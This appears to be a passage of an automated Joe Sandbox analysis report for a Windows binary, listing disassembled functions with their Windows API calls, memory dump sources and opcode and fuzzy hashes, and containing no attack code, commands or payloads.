GetProcessAffinityMask.KERNEL32(00000000), ref: 0038091C

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: efa93778fd05f9eb7c8aa67d72347cf3002fbb76f3bbf081b86625d6d67596c0
Instruction ID: 77d2a686502e48ae9bb09fb94d179da0a1bbca65c4c4063a298c37f144c371b9
Opcode Fuzzy Hash: efa93778fd05f9eb7c8aa67d72347cf3002fbb76f3bbf081b86625d6d67596c0
Instruction Fuzzy Hash: EBE06D33A11209AB6F4EEAB49C048BA729DEB4531472241A9E807D3211EA30DE0987A0

Function 0037A444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0037A27A,?,?,?,0037A113,?,00000001,00000000,?,?), ref: 0037A458
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0037A27A,?,?,?,0037A113,?,00000001,00000000,?,?), ref: 0037A489

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: ae76c8c5b697704ee19b4808c092df8002c63489692024e1bff4ffdcf0fcba96
Instruction ID: 7833b7a97ebf731ecd3384ba1d26205c0a4f46695a15675a4725b1487c869ac7
Opcode Fuzzy Hash: ae76c8c5b697704ee19b4808c092df8002c63489692024e1bff4ffdcf0fcba96
Instruction Fuzzy Hash: BCF08C312442097ADB12AE60DC05BDA776CAF05385F04C051BC8C86261DB768AA8AA50

Function 0038D573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0038D5A1
SetDlgItemTextW.USER32(00000065,?), ref: 0038D5B8

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: 57b68dc4ec05ac5a7dd434ac2540271138dabca3f65c20c44c028cb9ec11ede3
Instruction ID: b549f705a9bf2e859463006f7917dd55ea33281cd587000b13c701208ab2155b
Opcode Fuzzy Hash: 57b68dc4ec05ac5a7dd434ac2540271138dabca3f65c20c44c028cb9ec11ede3
Instruction Fuzzy Hash: FCF0E57150134C7AEB23BBB09C06FAA376CAB05746F0406D7B704AB0B2DE756A608772

Function 0037A12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,0037984C,?,?,00379688,?,?,?,?,003A1FA1,000000FF), ref: 0037A13E
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0037984C,?,?,00379688,?,?,?,?,003A1FA1,000000FF), ref: 0037A16C

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 90921c1586689fa8fe726286b68358e3c74f2ffa3d980068f18b38b5d26ae32b
Instruction ID: 245fcc1d8e372fba87729faa9f295cf2f65a6dba3a7d4f010c65c8b254ef7c6c
Opcode Fuzzy Hash: 90921c1586689fa8fe726286b68358e3c74f2ffa3d980068f18b38b5d26ae32b
Instruction Fuzzy Hash: 58E09B3554020867EB129F60DC41FE9775CAB05382F844065B988C7060DB619D94AF50

Function 0038A39D Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,003A1FA1,000000FF), ref: 0038A3D1
CoUninitialize.COMBASE(?,?,?,?,003A1FA1,000000FF), ref: 0038A3D6

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: fdd25979cf30e81d15e758ecdd645c9758df74ed8b0ec52c1d6adc3ab6194298
Instruction ID: 42f3dace1065c567a9304241b041df4f8a6fc42cfbce7a59221f2f14f165057c
Opcode Fuzzy Hash: fdd25979cf30e81d15e758ecdd645c9758df74ed8b0ec52c1d6adc3ab6194298
Instruction Fuzzy Hash: EFF06532558655DFC712EB4DDC05B55FBACFB49B20F04476AF41983760CB746800CB91

Function 0037A194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,0037A189,?,003776B2,?,?,?,?), ref: 0037A1A5
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0037A189,?,003776B2,?,?,?,?), ref: 0037A1D1

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: ecaa5059cbac81aa20dff385c9755bfa325c3ba980a76f0d9bc1c5068f0cc9e5
Instruction ID: d00b88f6e9764515fb4476e1d5e0d7a0de7234cf9f72523a9e40cf5c478558ef
Opcode Fuzzy Hash: ecaa5059cbac81aa20dff385c9755bfa325c3ba980a76f0d9bc1c5068f0cc9e5
Instruction Fuzzy Hash: 88E0D8755001285BDB32EB68DC05BD9B76CEF093E1F0182A1FD49E72A0D7709D449BE0

Function 00380085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003800A0
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0037EB86,Crypt32.dll,00000000,0037EC0A,?,?,0037EBEC,?,?,?), ref: 003800C2

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 7156c00833ddf96439f323dd7ef07f820ab1b690ee28abf1044d052f57633028
Instruction ID: 6cd691734f80d4ad6d91a760f9bec03e70e0767d60d72831af56f943995818d7
Opcode Fuzzy Hash: 7156c00833ddf96439f323dd7ef07f820ab1b690ee28abf1044d052f57633028
Instruction Fuzzy Hash: 87E0127690121C6ADB62AAA49C05FD6B76CEF0A382F0400A5BA49D3114DA749A448BA0

Function 00389B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00389B30
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00389B37

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 356f7ba3b9d49227799dda31cd45c4c298beb4dc94bbc11a318333da0f637bc1
Instruction ID: e109ac42149834c6a915041e178664fff1e3d59a5e3246f58253b3255722d368
Opcode Fuzzy Hash: 356f7ba3b9d49227799dda31cd45c4c298beb4dc94bbc11a318333da0f637bc1
Instruction Fuzzy Hash: FBE0ED71901318EFCB12EF98D9017AAB7ECEB49321F10849BE89597610D7B16E04AB91

Function 0039215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 0039329A: try_get_function.LIBVCRUNTIME ref: 003932AF

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0039217A
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00392185

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: 5ca11521258d29842ea965bfad981ce15d61f0574ca4f839e8de733854ee9bec
Instruction ID: 62508c44bd8b4d139a50e936420c13223e0050dde0a54c25db9907c667c81c13
Opcode Fuzzy Hash: 5ca11521258d29842ea965bfad981ce15d61f0574ca4f839e8de733854ee9bec
Instruction Fuzzy Hash: DAD022A9244F0234BC0B37B83C960EF234C5852BB03F10F46FB20CE1E2EE1484286112

Function 0038DC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadLock.DELAYIMP ref: 0038DC73
DloadProtectSection.DELAYIMP ref: 0038DC8F

Part of subcall function 0038DE67: DloadObtainSection.DELAYIMP ref: 0038DE77

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: Dload$Section$LockObtainProtect
String ID:
API String ID: 731663317-0
Opcode ID: ba6c4c51ca1d574af38901f2e1a4ca946cbbabf74dbc918fb9614c4194baecb6
Instruction ID: fb6b62854d4e2ae77de463592c2fafe6370a35d7a09fb2c58c45af42aa2744ac
Opcode Fuzzy Hash: ba6c4c51ca1d574af38901f2e1a4ca946cbbabf74dbc918fb9614c4194baecb6
Instruction Fuzzy Hash: ACD0C9705113005AC61BBB14B98675C23B8B705B44F6406A2E1068F5E0DFA84880D705

Function 003712E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 003712FB
ShowWindow.USER32(00000000), ref: 00371302

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: a5833bd7c0ea025e3cd9cbf4a8b88ff9fb354fb9aca3706e65db63cbe7b50f15
Instruction ID: c8835073da4a2f93a4a5b5f6c777059971234284606ef0726a66e0384b585eda
Opcode Fuzzy Hash: a5833bd7c0ea025e3cd9cbf4a8b88ff9fb354fb9aca3706e65db63cbe7b50f15
Instruction Fuzzy Hash: F8C01232058201BECB020BB0EC09D2FBBACABA5312F05C90AB2A5C0060C238C010DB11

Function 003719A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003719AB

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 15982e5d319c234dbe93f42f8bfd7a3328b57dc2bc6b899d2417fa9b95fff5f3
Instruction ID: 248b054df807bc8f285587efb827c06c864be0c11a31a02b7063ae675de8709b
Opcode Fuzzy Hash: 15982e5d319c234dbe93f42f8bfd7a3328b57dc2bc6b899d2417fa9b95fff5f3
Instruction Fuzzy Hash: 16C19432A042449FDF37CF6CC485BA97BA5EF06310F0984B9DC499F286CB399944CB61

Function 00373B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00373B42

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 42adea50bb87bf9d0fbed5b2ae284881553e4cc2462ff690787e33fae91025c7
Instruction ID: 919d10d44d9e853cbc07bb03a45ea1d734664435e1d7449094679f4c577b0960
Opcode Fuzzy Hash: 42adea50bb87bf9d0fbed5b2ae284881553e4cc2462ff690787e33fae91025c7
Instruction Fuzzy Hash: 7F719C71104F449EDB36DB70CC51AEBB7E8AB14301F44896EE5AE4B242DB356A48EF10

Function 0037837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00378384

Part of subcall function 00371380: __EH_prolog.LIBCMT ref: 00371385
Part of subcall function 00371380: new.LIBCMT ref: 003713FE

Part of subcall function 003719A6: __EH_prolog.LIBCMT ref: 003719AB

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 519b1f1c4e44da8a0a1eb3523b5bb9bf03c0622f1ff93a8b2390fd08d8d01483
Instruction ID: 813ee9b6268b534e6a4bb2b7d4a11d82d02737dc8e4109d550124c2eff24b30f
Opcode Fuzzy Hash: 519b1f1c4e44da8a0a1eb3523b5bb9bf03c0622f1ff93a8b2390fd08d8d01483
Instruction Fuzzy Hash: 1641C7318406549ADB32E761CC55BFA73B8AF50300F0580EAE54EA7453DFB85EC8DB50

Function 00371E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00371E05

Part of subcall function 00373B3D: __EH_prolog.LIBCMT ref: 00373B42

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 64f43a044d2510d4256900c99ad59f2fc10be2aa35956111fb647189e3f6c8ce
Instruction ID: 87ae9b6cd6437add2ec907887ca7e8b0b3f0cb5016bd2fd1e8ba9af0be885e3c
Opcode Fuzzy Hash: 64f43a044d2510d4256900c99ad59f2fc10be2aa35956111fb647189e3f6c8ce
Instruction Fuzzy Hash: D8213C729042089FCB26EF99D9419EEBBF5FF58300B1044ADE849A7651CB365E10DB61

Function 0038A7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0038A7C8

Part of subcall function 00371380: __EH_prolog.LIBCMT ref: 00371385
Part of subcall function 00371380: new.LIBCMT ref: 003713FE

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2651388161bb3bf4cb23c16ce6a024e1673d80d056f39f92e28cd5152a6163fb
Instruction ID: bf878ffd66eae597005b03a6dbf12f6a71e0105570f4f4d031c9f752edb17f28
Opcode Fuzzy Hash: 2651388161bb3bf4cb23c16ce6a024e1673d80d056f39f92e28cd5152a6163fb
Instruction Fuzzy Hash: B7217176C042599ECF16EF58C9415EEBBB4EF19300F0044EEE809AB242D7356E06DB61

Function 003792E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003792EB

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 25195b23ad65db8a1767a9933113aaf88dc1c9cb62146519db8418966c91018e
Instruction ID: 2f4adcac20204fafcfa7d6c21217c069ca81b3c8517b9197b4e316f4aa6751df
Opcode Fuzzy Hash: 25195b23ad65db8a1767a9933113aaf88dc1c9cb62146519db8418966c91018e
Instruction Fuzzy Hash: 05116577D105289BCB37AFA8CC51ADDB735EF48750F058216F81DBB251DA398D1187A0

Function 0037AA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 0037AA9A

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
Instruction ID: 4e66623687d975541a5fba58969b0396c1333348a062bf2e6f0cd94c6f439e06
Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
Instruction Fuzzy Hash: 0CF08C31914B059FDBB1DA78C941A1AB7E8EB51320F20C91AE49EC6680E778D880CB42

Function 00375BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00375BDC

Part of subcall function 0037B07D: __EH_prolog.LIBCMT ref: 0037B082

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
